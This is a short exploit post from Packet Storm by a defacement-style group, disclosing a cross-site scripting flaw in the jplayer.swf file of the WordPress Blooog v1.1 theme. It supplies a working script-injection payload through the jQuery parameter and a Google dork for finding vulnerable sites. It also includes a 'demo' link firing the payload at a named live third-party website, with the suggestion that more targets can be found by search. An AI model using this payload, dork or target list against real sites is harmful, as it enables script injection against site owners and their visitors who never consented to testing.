WordPress Blooog theme version 1.1 includes a jplayer.swf that suffers from a cross site scripting vulnerability.
c86848bb0e8d51a0877c1fc4d71f9fda75103c1d6be10dfee5867d08570c685cX-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: TUNISIAN CYBER
[+] Exploit Title: WordPress Blooog-v1.1 Theme Cross Site Scripting
[+] Date: 2-12-2013
[+] Category: WebApp
[+] Google Dork: inurl:"wp-content/themes/Blooog-v1.1"
[+] Tested on: Win7 , ubuntu 13.04
########################################################################################
P.O.C:
http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf
P4yl04D:
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//
The link will be like this:
http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//
Demo:(the rest at google,bing..)
http://www.951collegeradio.com/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
img:http://oi40.tinypic.com/33k6sqq.jpg
########################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed